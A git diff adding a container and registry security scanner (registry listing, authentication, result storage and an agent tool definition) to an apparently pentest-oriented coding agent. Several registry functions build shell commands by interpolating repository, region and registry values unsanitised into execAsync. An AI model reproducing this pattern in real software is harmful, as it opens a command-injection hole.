+    if (!options.repository) {
+      log.warn("Docker Hub requires repository name")
+      return images
+    }
+
+    try {
+      // Use Docker Hub API to list tags
+      const repo = options.repository.includes("/") ? options.repository : `library/${options.repository}`
+      const url = `https://hub.docker.com/v2/repositories/${repo}/tags?page_size=100`
+
+      const controller = new AbortController()
+      const timeoutId = setTimeout(() => controller.abort(), 30000)
+
+      const response = await fetch(url, { signal: controller.signal })
+      clearTimeout(timeoutId)
+
+      if (response.ok) {
+        const data = await response.json()
+        for (const tag of data.results || []) {
+          images.push({
+            registry: "docker.io",
+            repository: options.repository,
+            tag: tag.name,
+            digest: tag.digest,
+            size: tag.full_size,
+            pushedAt: tag.last_updated,
+          })
+        }
+      }
+    } catch (error) {
+      log.error("Failed to list Docker Hub images", { error })
+    }
+
+    return images
+  }
+
+  /**
+   * List ECR images
+   */
+  async function listECRImages(
+    registry: ContainerScanTypes.Registry,
+    options: { repository?: string; tags?: string[] }
+  ): Promise<ContainerScanTypes.RegistryImage[]> {
+    const images: ContainerScanTypes.RegistryImage[] = []
+
+    try {
+      const repoArg = options.repository ? `--repository-names ${options.repository}` : ""
+      const { stdout } = await execAsync(
+        `aws ecr describe-images ${repoArg} --output json ${registry.region ? `--region ${registry.region}` : ""}`
+      )
+
+      const data = JSON.parse(stdout)
+      for (const image of data.imageDetails || []) {
+        for (const tag of image.imageTags || ["untagged"]) {
+          images.push({
+            registry: registry.url,
+            repository: image.repositoryName,
+            tag,
+            digest: image.imageDigest,
+            size: image.imageSizeInBytes,
+            pushedAt: image.imagePushedAt,
+          })
+        }
+      }
+    } catch (error) {
+      log.error("Failed to list ECR images", { error })
+    }
+
+    return images
+  }
+
+  /**
+   * List ACR images
+   */
+  async function listACRImages(
+    registry: ContainerScanTypes.Registry,
+    options: { repository?: string; tags?: string[] }
+  ): Promise<ContainerScanTypes.RegistryImage[]> {
+    const images: ContainerScanTypes.RegistryImage[] = []
+
+    try {
+      const registryName = registry.url.replace(/\.azurecr\.io\/?$/, "")
+      const repoArg = options.repository ? `--repository ${options.repository}` : ""
+
+      const { stdout } = await execAsync(`az acr repository show-tags --name ${registryName} ${repoArg} --output json`)
+
+      const tags = JSON.parse(stdout)
+      for (const tag of tags) {
+        images.push({
+          registry: registry.url,
+          repository: options.repository || "",
+          tag,
+        })
+      }
+    } catch (error) {
+      log.error("Failed to list ACR images", { error })
+    }
+
+    return images
+  }
+
+  /**
+   * List GCR/Artifact Registry images
+   */
+  async function listGCRImages(
+    registry: ContainerScanTypes.Registry,
+    options: { repository?: string; tags?: string[] }
+  ): Promise<ContainerScanTypes.RegistryImage[]> {
+    const images: ContainerScanTypes.RegistryImage[] = []
+
+    try {
+      const project = registry.project || ""
+      const repository = options.repository || ""
+      const fullPath = `${registry.url}/${project}/${repository}`.replace(/\/+$/, "")
+
+      const { stdout } = await execAsync(`gcloud container images list-tags ${fullPath} --format=json`)
+
+      const tags = JSON.parse(stdout)
+      for (const image of tags) {
+        for (const tag of image.tags || []) {
+          images.push({
+            registry: registry.url,
+            repository,
+            tag,
+            digest: image.digest,
+            pushedAt: image.timestamp?.datetime,
+          })
+        }
+      }
+    } catch (error) {
+      log.error("Failed to list GCR images", { error })
+    }
+
+    return images
+  }
+
+  /**
+   * List GHCR images
+   */
+  async function listGHCRImages(
+    registry: ContainerScanTypes.Registry,
+    options: { repository?: string; tags?: string[] }
+  ): Promise<ContainerScanTypes.RegistryImage[]> {
+    const images: ContainerScanTypes.RegistryImage[] = []
+
+    // GHCR uses GitHub API - would need auth token
+    log.warn("GHCR listing requires GitHub API token")
+
+    return images
+  }
+
+  /**
+   * List images from generic registry
+   */
+  async function listGenericImages(
+    registry: ContainerScanTypes.Registry,
+    options: { repository?: string; tags?: string[] }
+  ): Promise<ContainerScanTypes.RegistryImage[]> {
+    const images: ContainerScanTypes.RegistryImage[] = []
+
+    if (!options.repository) {
+      log.warn("Generic registry requires repository name")
+      return images
+    }
+
+    // If specific tags provided, use those
+    if (options.tags && options.tags.length > 0) {
+      for (const tag of options.tags) {
+        images.push({
+          registry: registry.url,
+          repository: options.repository,
+          tag,
+        })
+      }
+    } else {
+      // Try to get tags using Docker registry API
+      try {
+        const url = `${registry.url}/v2/${options.repository}/tags/list`
+        const controller = new AbortController()
+        const timeoutId = setTimeout(() => controller.abort(), 30000)
+
+        const response = await fetch(url, { signal: controller.signal })
+        clearTimeout(timeoutId)
+
+        if (response.ok) {
+          const data = await response.json()
+          for (const tag of data.tags || []) {
+            images.push({
+              registry: registry.url,
+              repository: options.repository,
+              tag,
+            })
+          }
+        }
+      } catch (error) {
+        log.warn("Failed to list tags from generic registry", { error })
+      }
+    }
+
+    return images
+  }
+
+  /**
+   * Format full image reference
+   */
+  function formatImageRef(registry: ContainerScanTypes.Registry, image: ContainerScanTypes.RegistryImage): string {
+    if (registry.type === "dockerhub") {
+      return `${image.repository}:${image.tag}`
+    }
+    return `${registry.url}/${image.repository}:${image.tag}`
+  }
+
+  /**
+   * Create vulnerability finding
+   */
+  function createVulnFinding(
+    imageRef: string,
+    vuln: ContainerScanTypes.ImageVulnerability
+  ): ContainerScanTypes.ContainerFinding {
+    return {
+      id: `registry-vuln-${vuln.id}-${Date.now()}`,
+      category: "vulnerability",
+      severity: vuln.severity,
+      title: `${vuln.id}: ${vuln.packageName}`,
+      description: vuln.description || `Vulnerability ${vuln.id} found in ${vuln.packageName}@${vuln.installedVersion}`,
+      resource: {
+        type: "registry",
+        name: imageRef,
+      },
+      cveId: vuln.cveId,
+      remediation: vuln.fixedVersion
+        ? `Upgrade ${vuln.packageName} to version ${vuln.fixedVersion}`
+        : "No fix available, consider using alternative package",
+      references: vuln.references,
+      detectedAt: Date.now(),
+    }
+  }
+
+  /**
+   * Authenticate with registry
+   */
+  export async function authenticate(registry: ContainerScanTypes.Registry): Promise<boolean> {
+    try {
+      switch (registry.type) {
+        case "ecr":
+          await execAsync(
+            `aws ecr get-login-password ${registry.region ? `--region ${registry.region}` : ""} | docker login --username AWS --password-stdin ${registry.url}`
+          )
+          return true
+
+        case "acr":
+          const registryName = registry.url.replace(/\.azurecr\.io\/?$/, "")
+          await execAsync(`az acr login --name ${registryName}`)
+          return true
+
+        case "gcr":
+          await execAsync("gcloud auth configure-docker --quiet")
+          return true
+
+        default:
+          return true
+      }
+    } catch (error) {
+      log.error("Registry authentication failed", { registry: registry.url, error })
+      return false
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/containerscan/storage.ts b/packages/opencode/src/pentest/containerscan/storage.ts
new file mode 100644
index 00000000000..3e863769c49
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/storage.ts
@@ -0,0 +1,457 @@
+/**
+ * @fileoverview Container Scanner Storage
+ *
+ * Persistence layer for container scan results.
+ *
+ * @module pentest/containerscan/storage
+ */
+
+import { randomBytes } from "crypto"
+import { Storage } from "../../storage/storage"
+import { Log } from "../../util/log"
+import { ContainerScanTypes } from "./types"
+
+const log = Log.create({ service: "pentest.containerscan.storage" })
+
+// In-memory buffers for memory storage mode
+const scanBuffer: ContainerScanTypes.ContainerScanResult[] = []
+const sbomBuffer: ContainerScanTypes.SBOM[] = []
+const imageResultBuffer: ContainerScanTypes.ImageScanResult[] = []
+
+/**
+ * Storage configuration
+ */
+export interface StorageConfig {
+  storage?: "file" | "memory"
+}
+
+/**
+ * Generate a scan ID
+ */
+function generateScanId(): string {
+  const timestamp = Date.now().toString(36)
+  const random = randomBytes(6).toString("hex")
+  return `cscan_${timestamp}_${random}`
+}
+
+/**
+ * Generate an SBOM ID
+ */
+function generateSbomId(): string {
+  const timestamp = Date.now().toString(36)
+  const random = randomBytes(6).toString("hex")
+  return `sbom_${timestamp}_${random}`
+}
+
+/**
+ * Container scanner storage namespace.
+ */
+export namespace ContainerScanStorage {
+  // =====================
+  // Scan Results
+  // =====================
+
+  /**
+   * Save a container scan result
+   */
+  export async function saveScan(
+    scan: Omit<ContainerScanTypes.ContainerScanResult, "id"> | ContainerScanTypes.ContainerScanResult,
+    config: StorageConfig = {}
+  ): Promise<ContainerScanTypes.ContainerScanResult> {
+    const full: ContainerScanTypes.ContainerScanResult = {
+      ...scan,
+      id: "id" in scan && scan.id ? scan.id : generateScanId(),
+    }
+
+    const validated = ContainerScanTypes.ContainerScanResult.parse(full)
+
+    if (config.storage === "memory") {
+      const existingIdx = scanBuffer.findIndex((s) => s.id === validated.id)
+      if (existingIdx >= 0) {
+        scanBuffer[existingIdx] = validated
+      } else {
+        scanBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "containerscan", "scans", validated.id], validated)
+    }
+
+    log.info("Container scan saved", {
+      id: validated.id,
+      profile: validated.profile,
+      status: validated.status,
+      imagesScanned: validated.stats.imagesScanned,
+    })
+
+    return validated
+  }
+
+  /**
+   * Get a container scan by ID
+   */
+  export async function getScan(
+    scanId: string,
+    config: StorageConfig = {}
+  ): Promise<ContainerScanTypes.ContainerScanResult | undefined> {
+    if (config.storage === "memory") {
+      return scanBuffer.find((s) => s.id === scanId)
+    }
+
+    try {
+      const data = await Storage.read<ContainerScanTypes.ContainerScanResult>([
+        "pentest",
+        "containerscan",
+        "scans",
+        scanId,
+      ])
+      return data ? ContainerScanTypes.ContainerScanResult.parse(data) : undefined
+    } catch {
+      return undefined
+    }
+  }
+
+  /**
+   * List container scans
+   */
+  export async function listScans(
+    config: StorageConfig = {},
+    filters?: {
+      profile?: ContainerScanTypes.ProfileId
+      status?: ContainerScanTypes.Status
+      limit?: number
+    }
+  ): Promise<ContainerScanTypes.ContainerScanResult[]> {
+    let scans: ContainerScanTypes.ContainerScanResult[]
+
+    if (config.storage === "memory") {
+      scans = [...scanBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "containerscan", "scans"])
+      scans = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<ContainerScanTypes.ContainerScanResult>(key)
+          if (data) {
+            scans.push(ContainerScanTypes.ContainerScanResult.parse(data))
+          }
+        } catch {
+          log.warn("Failed to parse scan file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.profile) {
+      scans = scans.filter((s) => s.profile === filters.profile)
+    }
+    if (filters?.status) {
+      scans = scans.filter((s) => s.status === filters.status)
+    }
+
+    // Sort by recency
+    scans.sort((a, b) => b.startedAt - a.startedAt)
+
+    // Apply limit
+    if (filters?.limit) {
+      scans = scans.slice(0, filters.limit)
+    }
+
+    return scans
+  }
+
+  /**
+   * Delete a container scan
+   */
+  export async function deleteScan(scanId: string, config: StorageConfig = {}): Promise<boolean> {
+    if (config.storage === "memory") {
+      const idx = scanBuffer.findIndex((s) => s.id === scanId)
+      if (idx >= 0) {
+        scanBuffer.splice(idx, 1)
+        return true
+      }
+      return false
+    }
+
+    try {
+      await Storage.remove(["pentest", "containerscan", "scans", scanId])
+      return true
+    } catch {
+      return false
+    }
+  }
+
+  // =====================
+  // SBOM Storage
+  // =====================
+
+  /**
+   * Save an SBOM
+   */
+  export async function saveSBOM(
+    sbom: Omit<ContainerScanTypes.SBOM, "id"> | ContainerScanTypes.SBOM,
+    config: StorageConfig = {}
+  ): Promise<ContainerScanTypes.SBOM> {
+    const full: ContainerScanTypes.SBOM = {
+      ...sbom,
+      id: "id" in sbom && sbom.id ? sbom.id : generateSbomId(),
+    }
+
+    const validated = ContainerScanTypes.SBOM.parse(full)
+
+    if (config.storage === "memory") {
+      const existingIdx = sbomBuffer.findIndex((s) => s.id === validated.id)
+      if (existingIdx >= 0) {
+        sbomBuffer[existingIdx] = validated
+      } else {
+        sbomBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "containerscan", "sboms", validated.id], validated)
+    }
+
+    log.info("SBOM saved", {
+      id: validated.id,
+      image: validated.image,
+      format: validated.format,
+      componentCount: validated.components.length,
+    })
+
+    return validated
+  }
+
+  /**
+   * Get an SBOM by ID
+   */
+  export async function getSBOM(
+    sbomId: string,
+    config: StorageConfig = {}
+  ): Promise<ContainerScanTypes.SBOM | undefined> {
+    if (config.storage === "memory") {
+      return sbomBuffer.find((s) => s.id === sbomId)
+    }
+
+    try {
+      const data = await Storage.read<ContainerScanTypes.SBOM>([
+        "pentest",
+        "containerscan",
+        "sboms",
+        sbomId,
+      ])
+      return data ? ContainerScanTypes.SBOM.parse(data) : undefined
+    } catch {
+      return undefined
+    }
+  }
+
+  /**
+   * Get SBOM by image name
+   */
+  export async function getSBOMByImage(
+    image: string,
+    config: StorageConfig = {}
+  ): Promise<ContainerScanTypes.SBOM | undefined> {
+    if (config.storage === "memory") {
+      return sbomBuffer.find((s) => s.image === image)
+    }
+
+    const keys = await Storage.list(["pentest", "containerscan", "sboms"])
+    for (const key of keys) {
+      try {
+        const data = await Storage.read<ContainerScanTypes.SBOM>(key)
+        if (data && data.image === image) {
+          return ContainerScanTypes.SBOM.parse(data)
+        }
+      } catch {
+        continue
+      }
+    }
+
+    return undefined
+  }
+
+  /**
+   * List SBOMs
+   */
+  export async function listSBOMs(
+    config: StorageConfig = {},
+    filters?: {
+      image?: string
+      format?: string
+      limit?: number
+    }
+  ): Promise<ContainerScanTypes.SBOM[]> {
+    let sboms: ContainerScanTypes.SBOM[]
+
+    if (config.storage === "memory") {
+      sboms = [...sbomBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "containerscan", "sboms"])
+      sboms = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<ContainerScanTypes.SBOM>(key)
+          if (data) {
+            sboms.push(ContainerScanTypes.SBOM.parse(data))
+          }
+        } catch {
+          log.warn("Failed to parse SBOM file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.image) {
+      sboms = sboms.filter((s) => s.image.includes(filters.image!))
+    }
+    if (filters?.format) {
+      sboms = sboms.filter((s) => s.format === filters.format)
+    }
+
+    // Sort by recency
+    sboms.sort((a, b) => b.createdAt - a.createdAt)
+
+    // Apply limit
+    if (filters?.limit) {
+      sboms = sboms.slice(0, filters.limit)
+    }
+
+    return sboms
+  }
+
+  // =====================
+  // Image Scan Results
+  // =====================
+
+  /**
+   * Save an image scan result
+   */
+  export async function saveImageResult(
+    result: ContainerScanTypes.ImageScanResult,
+    config: StorageConfig = {}
+  ): Promise<void> {
+    const validated = ContainerScanTypes.ImageScanResult.parse(result)
+    const key = result.image.replace(/[/:]/g, "_")
+
+    if (config.storage === "memory") {
+      const existingIdx = imageResultBuffer.findIndex((r) => r.image === validated.image)
+      if (existingIdx >= 0) {
+        imageResultBuffer[existingIdx] = validated
+      } else {
+        imageResultBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "containerscan", "images", key], validated)
+    }
+
+    log.info("Image scan result saved", {
+      image: validated.image,
+      vulnerabilities: validated.stats.total,
+      critical: validated.stats.critical,
+    })
+  }
+
+  /**
+   * Get image scan result
+   */
+  export async function getImageResult(
+    image: string,
+    config: StorageConfig = {}
+  ): Promise<ContainerScanTypes.ImageScanResult | undefined> {
+    const key = image.replace(/[/:]/g, "_")
+
+    if (config.storage === "memory") {
+      return imageResultBuffer.find((r) => r.image === image)
+    }
+
+    try {
+      const data = await Storage.read<ContainerScanTypes.ImageScanResult>([
+        "pentest",
+        "containerscan",
+        "images",
+        key,
+      ])
+      return data ? ContainerScanTypes.ImageScanResult.parse(data) : undefined
+    } catch {
+      return undefined
+    }
+  }
+
+  /**
+   * List image scan results
+   */
+  export async function listImageResults(
+    config: StorageConfig = {},
+    filters?: {
+      hasCritical?: boolean
+      hasHigh?: boolean
+      limit?: number
+    }
+  ): Promise<ContainerScanTypes.ImageScanResult[]> {
+    let results: ContainerScanTypes.ImageScanResult[]
+
+    if (config.storage === "memory") {
+      results = [...imageResultBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "containerscan", "images"])
+      results = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<ContainerScanTypes.ImageScanResult>(key)
+          if (data) {
+            results.push(ContainerScanTypes.ImageScanResult.parse(data))
+          }
+        } catch {
+          log.warn("Failed to parse image result file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.hasCritical) {
+      results = results.filter((r) => r.stats.critical > 0)
+    }
+    if (filters?.hasHigh) {
+      results = results.filter((r) => r.stats.high > 0)
+    }
+
+    // Sort by total vulnerabilities
+    results.sort((a, b) => b.stats.total - a.stats.total)
+
+    // Apply limit
+    if (filters?.limit) {
+      results = results.slice(0, filters.limit)
+    }
+
+    return results
+  }
+
+  // =====================
+  // Cleanup
+  // =====================
+
+  /**
+   * Clear all container scan data
+   */
+  export async function clearAll(config: StorageConfig = {}): Promise<void> {
+    if (config.storage === "memory") {
+      scanBuffer.length = 0
+      sbomBuffer.length = 0
+      imageResultBuffer.length = 0
+    } else {
+      const paths = [
+        ["pentest", "containerscan", "scans"],
+        ["pentest", "containerscan", "sboms"],
+        ["pentest", "containerscan", "images"],
+      ]
+
+      for (const path of paths) {
+        const keys = await Storage.list(path)
+        for (const key of keys) {
+          await Storage.remove(key)
+        }
+      }
+    }
+
+    log.info("Container scan storage cleared")
+  }
+}
diff --git a/packages/opencode/src/pentest/containerscan/tool.ts b/packages/opencode/src/pentest/containerscan/tool.ts
new file mode 100644
index 00000000000..eb27430df67
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/tool.ts
@@ -0,0 +1,841 @@
+/**
+ * @fileoverview Container Security Scanner Tool
+ *
+ * Agent tool for container security scanning including
+ * Docker, Kubernetes, and registry security testing.
+ *
+ * @module pentest/containerscan/tool
+ */
+
+import z from "zod"
+import { Tool } from "../../tool/tool"
+import { ContainerScanTypes } from "./types"
+import { ContainerScanOrchestrator } from "./orchestrator"
+import { ContainerScanProfiles } from "./profiles"
+import { ContainerScanStorage } from "./storage"
+import { SyftParser } from "./parsers"
+
+/**
+ * Container Security Scanner Tool for penetration testing.
+ *
+ * Provides container security scanning for Docker, Kubernetes, and registries.
+ */
+export const ContainerScanTool = Tool.define("containerscan", async () => {
+  return {
+    description: `Container security scanning for Docker images, running containers, Kubernetes clusters, and registries.
+
+ACTIONS:
+- discover: Enumerate images, containers, and Kubernetes resources
+- scan: Run security scan with profile
+- scan-image: Scan specific image for vulnerabilities
+- scan-runtime: Analyze running containers
+- scan-cluster: Kubernetes cluster security audit
+- scan-registry: Scan images in a registry
+- sbom: Generate SBOM for image
+- compliance: Run compliance checks (CIS Docker/Kubernetes)
+- status: Get scan status
+- profiles: List available scan profiles
+
+PROFILES:
+- discovery: Enumerate assets only
+- quick: Fast vulnerability scan (critical/high only)
+- standard: Balanced scan with runtime and basic K8s
+- thorough: Comprehensive with SBOM and full K8s
+- compliance: Focus on compliance frameworks
+- sbom-only: Generate SBOM without vulnerability scanning
+
+EXAMPLES:
+- Discover: action="discover"
+- Scan image: action="scan-image", image="nginx:latest"
+- Scan runtime: action="scan-runtime"
+- Scan cluster: action="scan-cluster"
+- Generate SBOM: action="sbom", image="nginx:latest"
+- Full scan: action="scan", profile="thorough", targets=["nginx:latest"]`,
+
+    parameters: z.object({
+      action: z
+        .enum([
+          "discover",
+          "scan",
+          "scan-image",
+          "scan-runtime",
+          "scan-registry",
+          "scan-cluster",
+          "sbom",
+          "compliance",
+          "status",
+          "profiles",
+        ])
+        .describe("Action to perform"),
+
+      // Target options
+      image: z.string().optional().describe("Docker image to scan (e.g., nginx:latest)"),
+      targets: z.array(z.string()).optional().describe("List of targets for scan action"),
+
+      // Registry options
+      registryUrl: z.string().optional().describe("Registry URL for scan-registry"),
+      registryType: z
+        .enum(["dockerhub", "ecr", "acr", "gcr", "ghcr", "generic"])
+        .optional()
+        .describe("Registry type"),
+      repository: z.string().optional().describe("Repository name for registry scanning"),
+
+      // Scan options
+      profile: z
+        .enum(["discovery", "quick", "standard", "thorough", "compliance", "sbom-only"])
+        .optional()
+        .describe("Scan profile"),
+
+      // Kubernetes options
+      namespace: z.string().optional().describe("Kubernetes namespace to scan"),
+      context: z.string().optional().describe("Kubernetes context to use"),
+
+      // Compliance options
+      framework: z
+        .enum(["cis-docker", "cis-kubernetes", "nsa-cisa"])
+        .optional()
+        .describe("Compliance framework for compliance action"),
+
+      // SBOM options
+      sbomFormat: z
+        .enum(["json", "cyclonedx-json", "spdx-json"])
+        .optional()
+        .describe("SBOM output format"),
+
+      // Query options
+      scanId: z.string().optional().describe("Scan ID for status action"),
+      limit: z.number().optional().describe("Maximum results to return"),
+
+      // Timeout
+      timeout: z.number().optional().describe("Timeout in milliseconds"),
+    }),
+
+    async execute(params, ctx) {
+      switch (params.action) {
+        case "discover":
+          return handleDiscover(ctx)
+
+        case "scan":
+          return handleScan(params, ctx)
+
+        case "scan-image":
+          return handleScanImage(params, ctx)
+
+        case "scan-runtime":
+          return handleScanRuntime(params, ctx)
+
+        case "scan-registry":
+          return handleScanRegistry(params, ctx)
+
+        case "scan-cluster":
+          return handleScanCluster(params, ctx)
+
+        case "sbom":
+          return handleSBOM(params, ctx)
+
+        case "compliance":
+          return handleCompliance(params, ctx)
+
+        case "status":
+          return handleStatus(params)
+
+        case "profiles":
+          return handleProfiles()
+
+        default:
+          return {
+            title: `Unknown action: ${params.action}`,
+            output: `Unknown action. Use one of: discover, scan, scan-image, scan-runtime, scan-registry, scan-cluster, sbom, compliance, status, profiles`,
+            metadata: { action: params.action, status: "error" },
+          }
+      }
+    },
+  }
+})
+
+/**
+ * Handle discover action
+ */
+async function handleDiscover(
+  ctx: Tool.Context
+): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  ctx.metadata({
+    title: "Discovering container assets",
+    metadata: { action: "discover", status: "running" },
+  })
+
+  try {
+    const result = await ContainerScanOrchestrator.discover()
+    const tools = await ContainerScanOrchestrator.checkTools()
+
+    const lines: string[] = [
+      "## Container Asset Discovery",
+      "",
+      "### Available Tools",
+      `- Docker: ${tools.docker ? "Available" : "Not available"}`,
+      `- kubectl: ${tools.kubectl ? "Available" : "Not available"}`,
+      `- Trivy: ${tools.trivy ? "Available" : "Not available"}`,
+      `- Grype: ${tools.grype ? "Available" : "Not available"}`,
+      `- Syft: ${tools.syft ? "Available" : "Not available"}`,
+      `- Kubeaudit: ${tools.kubeaudit ? "Available" : "Not available"}`,
+      "",
+    ]
+
+    if (result.images.length > 0) {
+      lines.push(`### Docker Images (${result.images.length})`)
+      for (const image of result.images.slice(0, 10)) {
+        const tag = image.repoTags[0] || image.id.slice(0, 12)
+        lines.push(`- ${tag} (${formatBytes(image.size)})`)
+      }
+      if (result.images.length > 10) {
+        lines.push(`  ...and ${result.images.length - 10} more`)
+      }
+      lines.push("")
+    }
+
+    if (result.containers.length > 0) {
+      lines.push(`### Running Containers (${result.containers.length})`)
+      for (const container of result.containers.slice(0, 10)) {
+        lines.push(`- ${container.name}: ${container.image} (${container.state})`)
+      }
+      if (result.containers.length > 10) {
+        lines.push(`  ...and ${result.containers.length - 10} more`)
+      }
+      lines.push("")
+    }
+
+    if (result.cluster) {
+      lines.push(`### Kubernetes Cluster`)
+      lines.push(`- Context: ${result.cluster.context}`)
+      lines.push(`- Server: ${result.cluster.server}`)
+      if (result.cluster.version) lines.push(`- Version: ${result.cluster.version}`)
+      if (result.cluster.nodeCount) lines.push(`- Nodes: ${result.cluster.nodeCount}`)
+      if (result.cluster.podCount) lines.push(`- Pods: ${result.cluster.podCount}`)
+    }
+
+    return {
+      title: `Discovered ${result.images.length} images, ${result.containers.length} containers`,
+      output: lines.join("\n"),
+      metadata: {
+        action: "discover",
+        status: "success",
+        images: result.images.length,
+        containers: result.containers.length,
+        hasCluster: !!result.cluster,
+        tools,
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Discovery failed",
+      output: error instanceof Error ? error.message : String(error),
+      metadata: { action: "discover", status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle full scan action
+ */
+async function handleScan(
+  params: {
+    targets?: string[]
+    profile?: ContainerScanTypes.ProfileId
+    timeout?: number
+  },
+  ctx: Tool.Context
+): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  const targets = params.targets || ["*"]
+  const profile = params.profile || "standard"
+
+  ctx.metadata({
+    title: `Running ${profile} container scan`,
+    metadata: { action: "scan", profile, targets, status: "running" },
+  })
+
+  // Request permission
+  await ctx.ask({
+    permission: "bash",
+    patterns: ["docker *", "trivy *", "grype *", "syft *", "kubectl *", "kubeaudit *"],
+    always: ["docker *", "trivy *", "kubectl *"],
+    metadata: { action: "scan", profile },
+  })
+
+  try {
+    const result = await ContainerScanOrchestrator.scan(targets, {
+      profile,
+      timeout: params.timeout,
+    })
+
+    const lines: string[] = [
+      `## Container Security Scan Results`,
+      "",
+      `Scan ID: ${result.id}`,
+      `Profile: ${profile}`,
+      `Duration: ${result.stats.duration}ms`,
+      "",
+      "### Summary",
+      `- Images Scanned: ${result.stats.imagesScanned}`,
+      `- Containers Scanned: ${result.stats.containersScanned}`,
+      `- Total Vulnerabilities: ${result.stats.totalVulnerabilities}`,
+      `- Critical: ${result.stats.criticalVulnerabilities}`,
+      `- High: ${result.stats.highVulnerabilities}`,
+      `- Findings: ${result.stats.findingsCount}`,
+      "",
+    ]
+
+    // Show critical findings
+    const criticalFindings = result.findings.filter((f) => f.severity === "critical")
+    if (criticalFindings.length > 0) {
+      lines.push("### Critical Findings")
+      for (const finding of criticalFindings.slice(0, 5)) {
+        lines.push(`- **${finding.title}** (${finding.resource.name})`)
+        lines.push(`  ${finding.description.slice(0, 100)}...`)
+      }
+      lines.push("")
+    }
+
+    // Show high findings
+    const highFindings = result.findings.filter((f) => f.severity === "high")
+    if (highFindings.length > 0) {
+      lines.push(`### High Severity Findings (${highFindings.length})`)
+      for (const finding of highFindings.slice(0, 5)) {
+        lines.push(`- ${finding.title} (${finding.resource.name})`)
+      }
+      if (highFindings.length > 5) {
+        lines.push(`  ...and ${highFindings.length - 5} more`)
+      }
+    }
+
+    return {
+      title: `Scan complete: ${result.stats.criticalVulnerabilities} critical, ${result.stats.highVulnerabilities} high`,
+      output: lines.join("\n"),
+      metadata: {
+        action: "scan",
+        status: "success",
+        scanId: result.id,
+        stats: result.stats,
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Scan failed",
+      output: error instanceof Error ? error.message : String(error),
+      metadata: { action: "scan", status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle scan-image action
+ */
+async function handleScanImage(
+  params: {
+    image?: string
+    profile?: ContainerScanTypes.ProfileId
+    timeout?: number
+  },
+  ctx: Tool.Context
+): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  if (!params.image) {
+    return {
+      title: "Image required",
+      output: "Please provide an image to scan (e.g., nginx:latest)",
+      metadata: { action: "scan-image", status: "error" },
+    }
+  }
+
+  ctx.metadata({
+    title: `Scanning image: ${params.image}`,
+    metadata: { action: "scan-image", image: params.image, status: "running" },
+  })
+
+  await ctx.ask({
+    permission: "bash",
+    patterns: ["docker *", "trivy *", "grype *"],
+    always: ["docker *", "trivy *"],
+    metadata: { action: "scan-image", image: params.image },
+  })
+
+  try {
+    const result = await ContainerScanOrchestrator.scanImage(params.image, {
+      profile: params.profile,
+      timeout: params.timeout,
+    })
+
+    const lines: string[] = [
+      `## Image Scan: ${params.image}`,
+      "",
+      `Scanned with: ${result.scanTool}`,
+      "",
+      "### Vulnerability Summary",
+      `- Critical: ${result.stats.critical}`,
+      `- High: ${result.stats.high}`,
+      `- Medium: ${result.stats.medium}`,
+      `- Low: ${result.stats.low}`,
+      `- Total: ${result.stats.total}`,
+      `- Fixable: ${result.stats.fixable}`,
+      "",
+    ]
+
+    // Show top vulnerabilities
+    const sortedVulns = [...result.vulnerabilities].sort(
+      (a, b) => ContainerScanTypes.severityPriority(a.severity) - ContainerScanTypes.severityPriority(b.severity)
+    )
+
+    if (sortedVulns.length > 0) {
+      lines.push("### Top Vulnerabilities")
+      for (const vuln of sortedVulns.slice(0, 10)) {
+        const fix = vuln.fixedVersion ? ` -> ${vuln.fixedVersion}` : " (no fix)"
+        lines.push(`- **${vuln.id}** (${vuln.severity.toUpperCase()})`)
+        lines.push(`  ${vuln.packageName}@${vuln.installedVersion}${fix}`)
+      }
+      if (sortedVulns.length > 10) {
+        lines.push(`  ...and ${sortedVulns.length - 10} more`)
+      }
+    }
+
+    return {
+      title: `${params.image}: ${result.stats.critical} critical, ${result.stats.high} high`,
+      output: lines.join("\n"),
+      metadata: {
+        action: "scan-image",
+        status: "success",
+        image: params.image,
+        stats: result.stats,
+      },
+    }
+  } catch (error) {
+    return {
+      title: `Failed to scan ${params.image}`,
+      output: error instanceof Error ? error.message : String(error),
+      metadata: { action: "scan-image", status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle scan-runtime action
+ */
+async function handleScanRuntime(
+  params: { profile?: ContainerScanTypes.ProfileId },
+  ctx: Tool.Context
+): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  ctx.metadata({
+    title: "Scanning running containers",
+    metadata: { action: "scan-runtime", status: "running" },
+  })
+
+  await ctx.ask({
+    permission: "bash",
+    patterns: ["docker *"],
+    always: ["docker *"],
+    metadata: { action: "scan-runtime" },
+  })
+
+  try {
+    const result = await ContainerScanOrchestrator.scanRuntime({
+      profile: params.profile,
+    })
+
+    const lines: string[] = [
+      "## Runtime Security Analysis",
+      "",
+      "### Summary",
+      `- Containers Analyzed: ${result.stats.totalContainers}`,
+      `- Privileged Containers: ${result.stats.privilegedContainers}`,
+      `- Root Containers: ${result.stats.rootContainers}`,
+      `- Findings: ${result.stats.findingsCount}`,
+      "",
+    ]
+
+    if (result.findings.length > 0) {
+      lines.push("### Security Findings")
+      const grouped: Record<string, ContainerScanTypes.ContainerFinding[]> = {}
+      for (const f of result.findings) {
+        const key = f.severity
+        if (!grouped[key]) grouped[key] = []
+        grouped[key].push(f)
+      }
+
